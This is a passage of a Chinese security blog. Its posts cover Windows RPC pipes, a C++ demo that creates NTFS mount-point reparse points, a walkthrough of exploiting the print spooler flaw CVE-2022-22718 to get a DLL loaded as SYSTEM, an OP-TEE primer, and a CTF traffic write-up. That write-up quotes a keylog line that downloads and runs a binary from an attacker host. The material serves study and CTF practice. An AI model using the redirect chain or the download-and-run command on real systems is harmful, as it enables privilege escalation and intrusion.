    outputPipe.alloc = PipeAlloc;

    OutPipe(&outputPipe); /* Make the rpc */

    free((void*)globalRecvPipeData);

}//end ReceiveLongs()

// in pipedemoc_c.c

void InPipe( 
    /* [in] */ LONG_PIPE pipe_data)
{

    NdrClientCall2(
                  ( PMIDL_STUB_DESC  )&pipedemo_StubDesc,
                  (PFORMAT_STRING) &hello__MIDL_ProcFormatString.Format[66],
                  pipe_data);
    
}


void OutPipe( 
    /* [out] */ LONG_PIPE *pipe_data)
{

    NdrClientCall2(
                  ( PMIDL_STUB_DESC  )&pipedemo_StubDesc,
                  (PFORMAT_STRING) &hello__MIDL_ProcFormatString.Format[98],
                  pipe_data);
    
}

可以看到，这两个函数调用过程中，都有一个针对当前的LONG_PIPE对象赋值的过程。此过程其实是为了在调用InPipe和OutPipe中，此时的pipe类型将会怎么使用。这个函数在自动生成的Stub文件中作为普通的参数传入，不过其在RPC调用过程中存在特殊的处理过程（和之后漏洞相关）。此时根据Server的实现情况，其会反向调用来自用户态的函数，也就是最后会反过来找用户态的push和pull函数。在用户态完成调用之后，其会调用NdrClientCall2重新使用socket协议将数据发送出去，从而实现RPC。

总结

本文主要介绍了RPC的一些基础知识（主要也是MSDN的翻译），下一篇文章中将会详细介绍漏洞的相关详情

参考链接

https://docs.microsoft.com/en-us/windows/win32/rpc/rpc-start-page
https://github.com/microsoft/Windows-classic-samples/tree/main/Samples/Win7Samples/netds

Windows Reparse Point

2022-02-27T07:18:41.000Z

感觉很久都没写文章了，以后还是要养成记录学习过程的习惯，这样才不会老摸鱼。。。

Reparse Points

概念

之前学习的概念如下:

Windows仅仅支持两种类型的文件：普通文件以及文件目录。这两种文件都可以作为一个NTFS重解析点，一种特殊的文件，拥有一个修改的头部和一个可变的数据块。头部包括了一个表示当前重解析点的类型，这个tag将会被文件系统过滤驱动处理；或者包含内置的重解析点类型类型，即I/O管理器本身

为什么叫做重解析呢？这里要看一个例子:

1	C:\Symlink_to_File\File_to_SYS

首先解析C:\，发现是一个驱动
然后解析Symlink_to_File，发现其实是一个符号链接，于是重新解析当前路径，得到的路径其实为File Path
继续解析File_to_SYS，发现也是一个符号链接，于是再次发生重新解析，得到路径为SYS
实际发生解析的路径变成了C:\File Path\SYS

由于这个过程 重新解析了文件信息，所以称为重解析点。重解析通常用于符号链接或者挂载。在2019年之后，微软修改了符号链接的权限，现在规定只有管理员权限才能够随意创建符号链接，并且经过观察发现，即使是管理员，默认的创建权限也是关闭的，需要特殊开启

然而不知为何，挂载点MountPoint的创建却没有被限制。于是可以利用挂载点进行重解析，来对路径进行类似符号链接的重定向。

实验：如何创建重解析点

这边参考了ProjectZero的仓库，核心代码如左。

这里首先介绍一下核心代码：
首先，需要使用一个结构体:

typedef struct _REPARSE_DATA_BUFFER {
ULONG  ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR  DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;

这个结构体是一个union，同时处理了SymbolicLink和MountPoint两个点。同时需要引进一些常量:


#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)

#define IO_REPARSE_TAG_MOUNT_POINT              (0xA0000003L)       // winnt
#define IO_REPARSE_TAG_HSM                      (0xC0000004L)       // winnt
#define IO_REPARSE_TAG_DRIVE_EXTENDER           (0x80000005L)
#define IO_REPARSE_TAG_HSM2                     (0x80000006L)       // winnt
#define IO_REPARSE_TAG_SIS                      (0x80000007L)       // winnt
#define IO_REPARSE_TAG_WIM                      (0x80000008L)       // winnt
#define IO_REPARSE_TAG_CSV                      (0x80000009L)       // winnt
#define IO_REPARSE_TAG_DFS                      (0x8000000AL)       // winnt
#define IO_REPARSE_TAG_FILTER_MANAGER           (0x8000000BL)
#define IO_REPARSE_TAG_SYMLINK                  (0xA000000CL)       // winnt
#define IO_REPARSE_TAG_IIS_CACHE                (0xA0000010L)
#define IO_REPARSE_TAG_DFSR                     (0x80000012L)       // winnt
#define IO_REPARSE_TAG_DEDUP                    (0x80000013L)       // winnt
#define IO_REPARSE_TAG_APPXSTRM                 (0xC0000014L)
#define IO_REPARSE_TAG_NFS                      (0x80000014L)       // winnt
#define IO_REPARSE_TAG_FILE_PLACEHOLDER         (0x80000015L)       // winnt
#define IO_REPARSE_TAG_DFM                      (0x80000016L)
#define IO_REPARSE_TAG_WOF                      (0x80000017L)       // winn

这些都是一些在Reparse处理过程中可能用到的一些变量。
然后再之后的代码中，我们首先打开两个目录，一个叫做srcPath，一个叫做targetPath，其中我们假定一个如下的场景：

目前srcPath是我们有写权限的目录，但是targetPath我们没有
通过重解析，我们需要让srcPath解析绑定到targetPath上
当发生重解析之后，我们往srcPath中写入文件，最终会写入到targetPath目录中

当需要将当前的文件作为重解析句柄打开的时候，需要使用如下的代码:

HANDLE handle = CreateFile(path,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT,
0);
if (handle == INVALID_HANDLE_VALUE)
{
printf("Create Reparse Point failed with error code %d\n", GetLastError());
return NULL;
}

关键在于FILE_FLAG_OPEN_REPARSE_POINT，这个变量表明当前打开的句柄需要作为重解析点去处理。
然后代码需要构建之前提到的_REPARSE_DATA_BUFFER:

std::wstring target = FixupPath(wszTargetFullDir);
const size_t target_byte_size = target.size() * 2;
// print name the symbolic show name,it's not necessary
std::wstring printname = L"";
const size_t printname_byte_size = printname.size() * 2;
const size_t path_buffer_size = target_byte_size + printname_byte_size + 4 + 8;
const size_t total_size = path_buffer_size + REPARSE_DATA_BUFFER_HEADER_LENGTH;

其中printname_byte_size之所以还要跟着4+8是因为，首先路径末尾需要预留\0的位置（Unicode所以是2个字节大小）然后成员变量里面有两个Unicode对象，所以需要4，而8则是来自ntoskrnl!FsRtlValidateReparsePointBuffer的分析和调试。之后写如下逻辑:

buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
buffer->ReparseDataLength = static_cast(path_buffer_size);
buffer->Reserved = 0;

buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
buffer->MountPointReparseBuffer.SubstituteNameLength = static_cast(target_byte_size);
memcpy(buffer->MountPointReparseBuffer.PathBuffer, target.c_str(), target_byte_size + 2);
buffer->MountPointReparseBuffer.PrintNameOffset = static_cast(target_byte_size + 2);
buffer->MountPointReparseBuffer.PrintNameLength = static_cast(printname_byte_size);
memcpy(buffer->MountPointReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + 2);

由于PrintName只是一个展示的数据，所以这个位置的数据可以为空字符串。

之后对之前打开的Reparse文件描述符，使用IOCTL发送请求数据:

bool ret = DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT,
reparse_buffer, dwReparseSize, nullptr, 0, &cb, nullptr) == TRUE;
if (!ret)
{
printf("SetReparsePoint failed with error code:%d\n", GetLastError());
}

其中dwReparseSize为之前算好的total_size，表示此时发送的数据大小。一旦调用成功之后，srcPath就会被设置成重解析点，此时就能够起到类似符号链接的作用:

未设置重解析点

设置了重解析点

图标发生了变化

可以看到，设置重解析点之后，srcDir拥有了一个link属性，此时再srcDir中创建的所有文件其实等价于再targetDir中创建文件。

当完成了工作之后，可以通过如下的方式将这个重解析数据头删除:

buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
buffer->ReparseDataLength = 0;

bool ret = false;
DWORD dwIOCTLOutSize = 0;
ret = DeviceIoControl(hSrc, FSCTL_DELETE_REPARSE_POINT, buffer,
REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &dwIOCTLOutSize, NULL);
if (!ret)
{
printf("Reset the Reparse Point failed with error:%d\n", GetLastError());
return -1;
}

关于CVE的相关分析

CVE-2022-22718其实是关于printer一个老漏洞CVE-2020–1030的一个新的思路。这里简单介绍一下漏洞详情，以及上述提到的重解析漏洞在这个地方的利用方式。

漏洞成因

实际控制的进程

核心原因在于：对于文件夹的权限检查和创建没有再同一个时刻完成。

出现问题的API是SetPrinterDataEx

DWORD SetPrinterDataEx(
  _In_ HANDLE  hPrinter,
  _In_ LPCTSTR pKeyName,
  _In_ LPCTSTR pValueName,
  _In_ DWORD   Type,
  _In_ LPBYTE  pData,
  _In_ DWORD   cbData
);

这个API实际上是一个COM调用，通过这个调用能够对打印机的一些注册表配置进行修改，其中修改的注册表其实就是左边Printers展开后的这些打印机

由于调用这个API，需要用户对这个打印机存在PRINTER_ACCESS_ADMINISTER 的权限。如果无法打开现有的打印机的话，可以通过添加一个新的打印机来规避这个权限的月书。调用这个API可以往这些位置添加对应的注册表项。

这个API在SpoolDirectory这个值设置的时候，首先会检查相关权限（COM调用的场合都是没问题的），之后会进入相关的逻辑如下:

这个地方会尝试创建我们传入的目录，并且是具备可写的权限。如果可以创建，则检查这个文件的符号链接数量是否为1，具体逻辑如下

首先调用AdjustFileName将路径调整为CanonicalPath，也就是如下的形式:

1	\\?\C:\\CanonicalPath

然后调用下列逻辑，对当前的路径链接数进行比对

或者这个文件之前就存在了，那么就会把这个路径写入注册表，否则就会离开当前逻辑。

总结以下，上述的整体逻辑如下：

检查当前写入SpoolDirectory的路径是否可以创建
如果可以创建，则创建路径，并且将这个路径写入注册表

于是这里就出现了一个逻辑问题：对目录进行check的时候，和创建文件并不是发生在同一个时机，这里就存在一个类似竞争的问题。举个例子

首先，我们假设我们可以写入的路径是C:\\My\\Dir
我们将这个路径传入注册表，此时必然是可以通过检查的，包括是否可写，以及是否为符号链接
当调用玩SetPrinterDataEx函数之后，将这个路径用重解析的方式重定向到C:\\Windows\\System32

此时，C:\\My\\Dir其实本质上就指向了C:\\Windows\\System32。然后我们通过让spool进程重启，他就会去调用BuildPrinterInfo ,就会尝试将注册表中的路径读出来，并且尝试去创建对应的文件:

于是通过Repase Point，我们就能够获得一个任意目录创建的机会。

漏洞利用点

通过上述方法，我们能够获得一个任意目录写的机会，那么如何利用这个漏洞呢？这个就要扯到打印机的一个特性:

再任意一个打印机注册表目录项下，如果存在CopyFiles开头的键，那么这个键对应的Modules值中填写一个DLL路径，这个DLL将会被当前COM服务加载，并且load到打印机服务中。这个进程是SYSTEM权限。
打印机在加载DLL的时候，会在函数IsModuleFilePathAllowed检查加载的DLL路径是否为C:\\Windows\\System32或者C:\Windows\System32\spool\drivers\这两个目录，否则的话DLL不会加载。
为了实现上一步，首先需要能够修改对应的Module值，然后需要能够往这个目录下写入DLL

修改Module值可以用通过直接使用APISetPrinterDataEx进行调用。然而在这个过程中有一个小问题：在BuildPrinterInfo中，会检查注册表中读出来的路径，是否为DriverPath，而我们的目标就是C:\Windows\System32\spool\drivers\，也就是DriverPath，于是我们需要一个绕过的策略

上图为匹配逻辑，可以很容易的发现，他这边是直接简单的比较路径，其中PrinterPathName就是C:\Windows\System32\spool\drivers\。

于是现在的问题变成：

为了让SplLoadLibraryTheCopyFileModule加载DLL，我们的DLL路径必须要指向C:\Windows\System32\spool\drivers\。
为了让BuildPrinterInfo通过，此时我们利用任意文件创建的攻击原语(attack primitive)创建的路径必须与字符串字符串C:\Windows\System32\spool\drivers\不同

可以看到，第二项check比较的是字符串，而第一项要求的只是路径能够只想对应位置的DLL，因为在这个SplLoadLibraryTheCopyFileModule加载逻辑如下:

可以看到，在检查文件DLL是否合法（满足两个路径，就是IsModuleFilePathAllowed这个地方）之前，调用了一个关键函数MakeCanonicalPath，这个函数跟进去可以看到

可以看到这边会尝试获取这个文件，并且调用GetFinalPathNameByHandleW，这个API的作用是能够解析符号链接，也就是说，在真正的检查之前，这个路径会被先规范化，比如说

C:\My\Dir

上述路径被我们用重解析点解析到了

1	C:\Windows\system32

那么这个规范化解析就会变成

1	\\?\C:\Windows\system32

然后实际IsModuleFilePathAllowed比较的时候会先比较前四个字节是否为\\?\,如果是的话，会对其进行跳过，然后比较之后的路径是否为C:\Windows\system32。

为了这里可以使用另一种路径的表达方式:

1	\\localhost\C$\spooldir\printers\

根据文章提到的，在某些版本中比较路径的时候，在进行路径比较之前会将\\?\删除，所以这边如果使用上述的路径的话，当结构化处理的时候会转换成

1	\\？\UNC\C:\spooldir\printers

于是当进行比较的时候，就永远不会相等了。于是这一个攻击流程就是

首先调用SetPinterDataEx设置SpoolDirectory，此时填入任意一个可控的目录的UNC目录，此时可以通过第一层check->符号链接数量为1
然后使用ReparsePoint，将路径重定向到C:\Windows\system32\spool\driver\
然后第二次调用SetPinterDataEx,此时增添\\CopyFiles，并且指定DLL路径为system32下的APPVTerminator.dll
程序重启，读取SpoolDirectory之后进行第二次比较，此时由于路径为UNC目录，可以绕过第二个比较->此时不能为print driver目录，并且创建对应的路径4
此时往重解析点中，新建的目录4为任意用户可写，于是把攻击用的dll写入
然后第二次调用SetPinterDataEx,此时增添\\CopyFiles，并且写入攻击dll，攻击完成

修复后（修复后，在此处创建文件会提示没有权限，具体原因不明）
同时删除了AppVTerminator.dll

附录

完整的Reparse实验代码:

#include
#include
#include


// Taken from ntifs.h
#define SYMLINK_FLAG_RELATIVE   1

typedef struct _REPARSE_DATA_BUFFER {
ULONG  ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR  DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;

#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)

#define IO_REPARSE_TAG_MOUNT_POINT              (0xA0000003L)       // winnt
#define IO_REPARSE_TAG_HSM                      (0xC0000004L)       // winnt
#define IO_REPARSE_TAG_DRIVE_EXTENDER           (0x80000005L)
#define IO_REPARSE_TAG_HSM2                     (0x80000006L)       // winnt
#define IO_REPARSE_TAG_SIS                      (0x80000007L)       // winnt
#define IO_REPARSE_TAG_WIM                      (0x80000008L)       // winnt
#define IO_REPARSE_TAG_CSV                      (0x80000009L)       // winnt
#define IO_REPARSE_TAG_DFS                      (0x8000000AL)       // winnt
#define IO_REPARSE_TAG_FILTER_MANAGER           (0x8000000BL)
#define IO_REPARSE_TAG_SYMLINK                  (0xA000000CL)       // winnt
#define IO_REPARSE_TAG_IIS_CACHE                (0xA0000010L)
#define IO_REPARSE_TAG_DFSR                     (0x80000012L)       // winnt
#define IO_REPARSE_TAG_DEDUP                    (0x80000013L)       // winnt
#define IO_REPARSE_TAG_APPXSTRM                 (0xC0000014L)
#define IO_REPARSE_TAG_NFS                      (0x80000014L)       // winnt
#define IO_REPARSE_TAG_FILE_PLACEHOLDER         (0x80000015L)       // winnt
#define IO_REPARSE_TAG_DFM                      (0x80000016L)
#define IO_REPARSE_TAG_WOF                      (0x80000017L)       // winnt

static int g_last_error = 0;



bool CreateMyDirectory(const WCHAR path[])
{
wprintf(L"Create Directory:%s\n", path);
if (CreateDirectory(path, NULL) || (GetLastError() == ERROR_ALREADY_EXISTS))
{
return true;
}
else
{
return false;
}

}


HANDLE OpenReparsePoint(const WCHAR path[])
{
HANDLE handle = CreateFile(path,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT,
0);
if (handle == INVALID_HANDLE_VALUE)
{
printf("Create Reparse Point failed with error code %d\n", GetLastError());
return NULL;
}

return handle;

}

bool SetReparsePoint(HANDLE handle, REPARSE_DATA_BUFFER* reparse_buffer, DWORD dwReparseSize)
{
DWORD cb;

bool ret = DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT,
reparse_buffer, dwReparseSize, nullptr, 0, &cb, nullptr) == TRUE;
if (!ret)
{
printf("SetReparsePoint failed with error code:%d\n", GetLastError());
}

return ret;
}

std::wstring FixupPath(std::wstring str)
{
if (str[0] != '\\')
{
return L"\\??\\" + str;
}

return str;
}


int main()
{
std::cout << "[+] Reparse Test! [+]" << std::endl;

WCHAR wcsFullDir[MAX_PATH] = { 0 };
GetCurrentDirectory(MAX_PATH, wcsFullDir);
WCHAR srcDir[] = L"\\srcDir";
WCHAR targetDir[] = L"\\targetDir";

std::wstring wszSrcFullDir = wcsFullDir;
wszSrcFullDir += srcDir;
std::wstring wszTargetFullDir = wcsFullDir;
wszTargetFullDir += targetDir;

std::wcout << L"Current FullDir is " << wcsFullDir << std::endl;



if (!CreateMyDirectory(wszSrcFullDir.c_str()))
{
std::wcout << "Create " << wszSrcFullDir << "Failed!" << std::endl;
return -1;
}

if (!CreateMyDirectory(wszTargetFullDir.c_str()))
{
std::wcout << "Create " << wszTargetFullDir << "Failed!" << std::endl;
return -1;
}

puts("[+] Now open directory as reparse point [+] \n");
// return 0;

HANDLE hSrc = OpenReparsePoint(wszSrcFullDir.c_str());
// HANDLE hFake = OpenReparsePoint(srcDir);
if (!hSrc)
{
puts("[+] Open handle failed\n");
return -1;
}

// Here we build the target binary
std::wstring target = FixupPath(wszTargetFullDir);
const size_t target_byte_size = target.size() * 2;
// print name the symbolic show name,it's not necessary
std::wstring printname = L"";
const size_t printname_byte_size = printname.size() * 2;
const size_t path_buffer_size = target_byte_size + printname_byte_size + 4 + 8;
const size_t total_size = path_buffer_size + REPARSE_DATA_BUFFER_HEADER_LENGTH;
printf("The ReparseDataLength = %d \n", path_buffer_size);
printf("The total_size = %d \n", total_size);

REPARSE_DATA_BUFFER* buffer = new REPARSE_DATA_BUFFER();
/*
 *WARNING!Here could not create the SYMBOLIC
 *
 * If using whoami /all ,it will show the privilege SeCreateSymbolicLinkPrivilege has been disabled
 * so if here we couldn't use code below:
 * but we could try to using the reparse point with Mount
 * it will reparse the directory as mount, so it can try to 
 * work like Symbolic


// typed_buffer_ptr buffer(total_size);

buffer->ReparseTag = IO_REPARSE_TAG_SYMLINK;
buffer->ReparseDataLength = static_cast(path_buffer_size);
buffer->Reserved = 0;

buffer->SymbolicLinkReparseBuffer.SubstituteNameOffset = 0;
buffer->SymbolicLinkReparseBuffer.SubstituteNameLength = static_cast(target_byte_size);
memcpy(buffer->SymbolicLinkReparseBuffer.PathBuffer, target.c_str(), target_byte_size + 2);
buffer->SymbolicLinkReparseBuffer.PrintNameOffset = static_cast(target_byte_size + 2);
buffer->SymbolicLinkReparseBuffer.PrintNameLength = static_cast(printname_byte_size);
memcpy(buffer->SymbolicLinkReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + 2);
buffer->SymbolicLinkReparseBuffer.Flags = SYMLINK_FLAG_RELATIVE;
*/
buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
buffer->ReparseDataLength = static_cast(path_buffer_size);
buffer->Reserved = 0;

buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
buffer->MountPointReparseBuffer.SubstituteNameLength = static_cast(target_byte_size);
memcpy(buffer->MountPointReparseBuffer.PathBuffer, target.c_str(), target_byte_size + 2);
buffer->MountPointReparseBuffer.PrintNameOffset = static_cast(target_byte_size + 2);
buffer->MountPointReparseBuffer.PrintNameLength = static_cast(printname_byte_size);
memcpy(buffer->MountPointReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + 2);
// Next, send IOCTL to the NTFS file handle to make it symbolic 
if(!SetReparsePoint(hSrc, buffer, total_size))
{
printf("Set Reparse Point failed with error :%d\n", GetLastError());
return -1;
}

// Now the src will become the target symbolic, we will try to create
// file at src path. If success, the file will appear at target file path
puts("[+] Create Symbolic success! now try create one file at src path [+]");

std::wstring TargetFilePath = wszSrcFullDir;
TargetFilePath += L"\\TestFile";
HANDLE hFile = CreateFile(
TargetFilePath.c_str(),
GENERIC_READ | GENERIC_WRITE,
0, 0,
CREATE_NEW,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("Create file failed with error code:%d\n",GetLastError());
return -1;
}

std::string content = "Success!";
DWORD dwByteWrite = 0;
WriteFile(hFile,
content.c_str(),
content.size(),
&dwByteWrite,
NULL);

CloseHandle(hFile);

// succcess

puts("[+] Success! enter any character to delete symbolic\n");
char c = getchar();

buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
buffer->ReparseDataLength = 0;

bool ret = false;
DWORD dwIOCTLOutSize = 0;
ret = DeviceIoControl(hSrc, FSCTL_DELETE_REPARSE_POINT, buffer,
REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &dwIOCTLOutSize, NULL);
if (!ret)
{
printf("Reset the Reparse Point failed with error:%d\n", GetLastError());
return -1;
}

CloseHandle(hSrc);
puts("[+] Reparse Success!\n");

return 0;
}

RWCTF-OPTEE

2022-01-25T23:46:58.000Z

好久没有写博客，最近打了一些有趣得比赛，来记录一下相关得学习内容

RWCTF-OPTEE

这次比赛出了两个关于OPTEE得题目，后来查了一下也是一个手机上用的比较常见得概念了，为了能够更好的做题目，这边首先先简单的对这个玩意儿进行简单的学习:

关于TEE

运行 Linux 或 Android 的典型嵌入式系统在内核和用户空间包中都存在大量安全漏洞。漏洞可能允许攻击者访问敏感信息和/或插入恶意软件。TEE 增加了一个额外的安全层，其中运行在 TEE 上的代码/数据不能从正常的世界操作系统（例如：Linux/Android）访问/篡改。在 TEE（安全世界）上运行的软件通常涉及一个面向安全的微型操作系统（例如：OP-TEE OS）以及受信任的应用程序。受信任的应用程序旨在处理机密信息，例如信用卡 PIN、私钥、客户数据、受 DRM 保护的媒体等。

在硬件方面，基于 ARM 的处理器使用 TrustZone 技术实现 TEE。TrustZone 使单个物理处理器内核能够安全有效地执行来自正常世界（如 Linux/Android 等富操作系统）和安全世界（如 OP-TEE 等安全操作系统）的代码。这允许高性能安全软件与正常的世界操作环境一起运行。TrustZone 实现了基于“状态”的内存和 IO 保护。即当处理器在安全状态/上下文（安全世界）中运行时，它对系统有不同的看法，并且可以访问通常无法从非安全状态/上下文（正常世界）访问的内存/外围设备. 当更改当前运行的虚拟处理器时，两个虚拟处理器上下文通过监控模式切换。

对于运行环境（软件层面）而言，此时会同时运行两种操作系统。我们常用的操作系统们被称为Rich Execution Environment (REE)富执行环境，而安全运行环境则称为Trusted Execution Environment (TEE) 可受信任的执行环境。这两类环境都会以特权模式运行，而这上面的程序都是以用户模式的形式运行。当他们需要交互的时候，就会使用系统提供的API进行相互的调用。

TEE 需要软件和硬件（内置于处理器中）支持。这边主要就是介绍其中得软件实现——OPTEE

OPTEE介绍

在现代得计算机场景下（尤其是手机）有可能会出现如下得场景：手机可能存储了很重要得个人信息，比如说个人得指纹，虹膜等等重要数据。这类数据得安全性和普通数据不能相提并论。为了解决这个问题，在这类机器上可以安装两个不同得OS：我们在同一个CPU上运行两个OS，其中一个OS只负责一些安全存储或者计算的操作，比如存储我们的指纹数据等。另一个OS就是我们平时用的OS，比如安卓系统，对于这个OS来说，安全OS是不可见的，所以根本没有权限获取到安全OS中的隐私数据。

OP-TEE，open source project Trusted Execution Environment (TEE)，开源可信执行环境。TEE与Rich Execution Environment (REE)相对应。REE中运行的是non-secure OS，我们所看到的系统，安卓，Linux系统等都运行在REE。TEE中运行的是secure OS，他需要Arm TrustZone技术的支持，依赖硬件设计，REE中的系统和应用是无法直接访问TEE中的资源的，只能通过TEE提供的接口获取一个结果，其间的运算和存储等操作对REE中的系统和应用都是不可见的，从而来保证安全性。

OPTEE本质上是在模仿进程间的交互，两个OS之间也需要交互，因此我们需要一种机制来访问安全OS的服务，也就是CA/TA这种调用机制。

参考网站

https://timesys.com/security/trusted-software-development-op-tee/

Misc-SecTraffice writeup

2021-04-24T01:04:43.000Z

有一阵子没有玩CTF，后来有一个师傅问了一下这个题目，突然就来了兴趣，于是好好研究了一下这个题目，发现这个题目质量确实可以，于是写了一份WP来记录一哈

本文首发于春秋伽玛 https://mp.weixin.qq.com/s/sPgcxqG6gwjvgEJzWHC4KQ

初步分析

文件下载下来，可能看到一个叫做keylog的文件和一个pcap包，pcap包中数据流分成三个stream，分别包含如下内容

第一个stream是一个ssh链接
第二个是一个http传输的一个叫做bash的文件
第三个完全是一个加密的流量，看不出来具体内容

第一个stream表示ssh链接，不过ssh通信的内容肯定是加密的:

第二个stream是一个http请求包，似乎下载了文件

第三个stream看不太懂发生了什么

而keylog文件里面的内容如下:

1
2
3

wget http://192.168.1.5:9999/bash
chmod +x bash
./bash Op0VPMasjuNZvdas3e5igGad

首先我们分析题目，题目提到说，这是一个攻击者通过弱口令进入了受害者机器然后进行操作为背景的题目。所以这边的流量和keylog可以理解成是针对这么个场景进行分析的，那么此时，结合流量包和keylog，我们能够分析出如下条件:

从题目描述可知，攻击者使用ssh登陆上了被害者的电脑，那么此时keylog记录的是攻击者的IP，也就是192.168.1.5
从流量包可知，另一个通信的IP是192.168.1.4，所以这个是受害者的IP
ssh流量记录的正是攻击者用ssh连接到受害者的流量，敲下了keylog中记录的数据的那段记录

于是整个题目大致的流程如下:

了解到这些初步信息之后，我们再对题目给出的信息进行进一步的分析

stream 0：ssh与侧信道

结合题目提示到的ssh侧信道，可以找到一个叫做packetStrider的脚本，能够通过输入传输的时间，进行测信道分析。其中能够比较明显的区分Enter、Delete、普通字符输入这些。我们使用工具简单分析:

┏━━━━ Reporting results for stream 0
┃
┃ Stream 0 of pcap '../../sectraffic.pcap'
┃ 216 packets in total, first at 2021-03-21 15:47:54
┃ 192.168.1.5:57535 ->  192.168.1.4:22
┃ Client Proto : SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7
┃ hassh        : 0df0d56bb50c6b2426d8d40234bf1826
┃ Server Proto : SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10
┃ hasshServer  : d43d91bc39d5aaed819ad9f6b57b7348
┃ Summary of findings:
┃        6 Forward SSH login/init events
┃        90 Forward keystroke related events
┃ Detailed Events:
┃     packet     time(s)   delta(s)   Direction Indicator      Bytes   Notes
┃   -----------------------------------------------------------------------
┃       0         0         0         packet0   packet0          40
┃       5         0.052     0.052     forward   key offered     364
┃       6         1.22      1.168     forward   key accepted     16    Delta suggests hostkey was NOT in known_hosts, user manually accepted it
┃       10        1.275     0.055     forward   login prompt     52
┃       11        1.279     0.004     forward   login failure   372    Delta suggests Certificate Auth, pwd to cert null or non interactive
┃       12        1.28      0.001     forward   login prompt     52
┃       13        3.573     2.293     forward   login success    84    < 8 char Password, entered interactively by human
┃       20        3.928     0.355     forward   agent fwding    520    !! -A option used. Client private key sharing via SSH Agent Forwarding
┃       23        5.416     1.488     forward   keystroke        36
┃       25        5.723     0.307     forward   keystroke        36
┃       27        6.132     0.409     forward   keystroke        36
┃       29        6.443     0.311     forward   keystroke        36
┃       31        6.952     0.508     forward   keystroke        36
┃       33        7.361     0.41      forward   keystroke        36
┃       35        8.085     0.724     forward   keystroke        36
┃       37        8.385     0.301     forward   keystroke        36
┃       39        8.897     0.511     forward   keystroke        36
┃       41        9.716     0.819     forward   keystroke        36
┃       43        10.433    0.717     forward   keystroke        36
┃       45        10.842    0.409     forward   keystroke        36
┃       47        12.188    1.346     forward   keystroke        36
┃       49        12.589    0.401     forward   keystroke        36
┃       51        13.268    0.679     forward   keystroke        36
┃       53        13.709    0.441     forward   keystroke        36
┃       55        14.221    0.512     forward   keystroke        36
┃       57        14.738    0.517     forward   keystroke        36
┃       59        15.149    0.411     forward   keystroke        36
┃       61        15.859    0.71      forward   keystroke        36
┃       63        16.473    0.614     forward   keystroke        36
┃       65        16.89     0.416     forward   keystroke        36
┃       67        17.702    0.812     forward   keystroke        36
┃       69        18.475    0.773     forward   keystroke        36
┃       71        19.238    0.762     forward   keystroke        36
┃       73        19.852    0.614     forward   keystroke        36
┃       75        20.365    0.513     forward   keystroke        36
┃       77        20.885    0.52      forward   keystroke        36
┃       79        21.498    0.613     forward   keystroke        36
┃       81        22.207    0.709     forward   keystroke        36
┃       83        22.719    0.512     forward   keystroke        36
┃       85        23.231    0.512     forward   keystroke        36
┃       87        23.845    0.614     forward   keystroke        36
┃       99        25.586    1.741     forward   _┃ ENTER        1080
┃       100       26.815    1.229     forward   keystroke        36
┃       102       27.224    0.41      forward   keystroke        36
┃       104       27.736    0.512     forward   keystroke        36
┃       106       28.248    0.512     forward   keystroke        36
┃       108       29.075    0.827     forward   keystroke        36
┃       110       29.483    0.408     forward   keystroke        36
┃       112       30.296    0.813     forward   keystroke        36
┃       114       30.808    0.512     forward   keystroke        36
┃       116       31.525    0.717     forward   keystroke        36
┃       118       32.753    1.228     forward   keystroke        36
┃       120       33.267    0.514     forward   keystroke        36
┃       122       33.631    0.364     forward   keystroke        36
┃       124       34.186    0.555     forward   keystroke        36
┃       128       35.722    1.536     forward   _┃ ENTER        100
┃       129       38.288    2.566     forward   keystroke        36
┃       131       38.901    0.613     forward   keystroke        36
┃       133       39.518    0.617     forward   keystroke        36
┃       135       40.131    0.613     forward   keystroke        36
┃       137       40.583    0.452     forward   keystroke        36
